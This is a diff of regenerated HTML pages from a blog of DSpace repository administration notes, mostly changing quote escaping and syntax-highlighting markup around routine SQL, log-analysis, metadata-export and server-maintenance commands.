<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&quot;dc.title&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&quot;THUMBNAIL&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&quot;-1&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
</code></pre><ul>
<li>I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade</li>
<li>I&rsquo;ve raised a ticket with Atmire to ask</li>
@ -354,7 +354,7 @@ DELETE 1
<li>We had been using <code>DC=ILRI</code> to determine whether a user was ILRI or not</li>
<li>It looks like we might be able to use OUs now, instead of DCs:</li>
</ul>
<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=org&quot; -D &quot;admigration1@cgiarad.org&quot; -W &quot;(sAMAccountName=admigration1)&quot;
<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34;
</code></pre>
<a href='https://alanorth.github.io/cgspace-notes/2016-09/'>Read more →</a>
</article>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -140,9 +140,9 @@ $ git rebase -i dspace-5.5
<li>Add <code>dc.description.sponsorship</code> to Discovery sidebar facets and make investors clickable in item view (<a href="https://github.com/ilri/DSpace/issues/232">#232</a>)</li>
<li>I think this query should find and replace all authors that have &ldquo;,&rdquo; at the end of their names:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.+?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
UPDATE 95
dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
text_value
------------
(0 rows)
@ -198,7 +198,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
<li>I have blocked access to the API now</li>
<li>There are 3,000 IPs accessing the REST API in a 24-hour period!</li>
</ul>
<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/rest.log | uniq | wc -l
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | uniq | wc -l
3168
</code></pre>
<a href='https://alanorth.github.io/cgspace-notes/2016-05/'>Read more →</a>
@ -350,7 +350,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
<li>Looks like DSpace exhausted its PostgreSQL connection pool</li>
<li>Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
78
</code></pre>
<a href='https://alanorth.github.io/cgspace-notes/2015-11/'>Read more →</a>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/posts/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Posts"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -109,11 +109,11 @@
<ul>
<li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
</span></span></code></pre></div>
<a href='https://alanorth.github.io/cgspace-notes/2022-03/'>Read more →</a>
</article>
@ -185,13 +185,13 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
<li>Atmire merged some changes I had submitted to the COUNTER-Robots project</li>
<li>I updated our local spider user agents and then re-ran the list with my <code>check-spider-hits.sh</code> script on CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
Purging 1989 hits from The Knowledge AI in statistics
Purging 1235 hits from MaCoCu in statistics
Purging 455 hits from WhatsApp in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
</span></span><span style="display:flex;"><span>Purging 1989 hits from The Knowledge AI in statistics
</span></span><span style="display:flex;"><span>Purging 1235 hits from MaCoCu in statistics
</span></span><span style="display:flex;"><span>Purging 455 hits from WhatsApp in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679
</span></span></code></pre></div>
<a href='https://alanorth.github.io/cgspace-notes/2021-12/'>Read more →</a>
</article>
@ -214,9 +214,9 @@ Purging 455 hits from WhatsApp in statistics
<li>I experimented with manually sharding the Solr statistics on DSpace Test</li>
<li>First I exported all the 2019 stats from CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid
$ zstd statistics-2019.json
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid
</span></span><span style="display:flex;"><span>$ zstd statistics-2019.json
</span></span></code></pre></div>
<a href='https://alanorth.github.io/cgspace-notes/2021-11/'>Read more →</a>
</article>
@ -238,15 +238,15 @@ $ zstd statistics-2019.json
<ul>
<li>Export all affiliations on CGSpace and run them against the latest RoR data dump:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt
$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
ations-matching.csv
$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
1879
$ wc -l /tmp/2021-10-01-affiliations.txt
7100 /tmp/2021-10-01-affiliations.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt
</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
</span></span><span style="display:flex;"><span>ations-matching.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
</span></span><span style="display:flex;"><span>1879
</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-10-01-affiliations.txt
</span></span><span style="display:flex;"><span>7100 /tmp/2021-10-01-affiliations.txt
</span></span></code></pre></div><ul>
<li>So we have 1879/7100 (26.46%) matching already</li>
</ul>
<a href='https://alanorth.github.io/cgspace-notes/2021-10/'>Read more →</a>
@ -303,8 +303,8 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
<ul>
<li>Update Docker images on AReS server (linode20) and reboot the server:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
</span></span></code></pre></div><ul>
<li>I decided to upgrade linode20 from Ubuntu 18.04 to 20.04</li>
</ul>
<a href='https://alanorth.github.io/cgspace-notes/2021-08/'>Read more →</a>
@ -328,9 +328,9 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
<ul>
<li>Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
COPY 20994
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 20994
</span></span></code></pre></div>
<a href='https://alanorth.github.io/cgspace-notes/2021-07/'>Read more →</a>
</article>

Some files were not shown because too many files have changed in this diff Show More